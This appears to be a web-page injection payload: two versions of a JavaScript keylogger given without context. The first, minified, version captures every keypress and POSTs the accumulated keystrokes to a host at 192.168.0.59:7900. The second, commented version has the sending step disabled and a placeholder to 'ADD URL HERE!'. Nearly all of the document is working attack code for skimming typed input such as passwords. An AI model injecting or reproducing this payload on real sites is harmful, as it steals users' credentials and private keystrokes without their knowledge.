<script type="text/javascript">var l = "";document.onkeypress = function (e) {l += e.key;var req = new XMLHttpRequest();req.open("POST","http://192.168.0.59:7900/", true);req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");req.send("data=" + l);}</script>

 <script type="text/javascript">
    var l = "";             // empty string to concatenate keys onto
    document.onkeypress = function (e) {
        l += e.key;
        console.log(l);     // remove this line 

        /*
        var req = new XMLHttpRequest();
        req.open("POST","<server goes here>", true); 				// ADD URL HERE!
        req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        req.send("data=" + l);
        */
    }
</script>


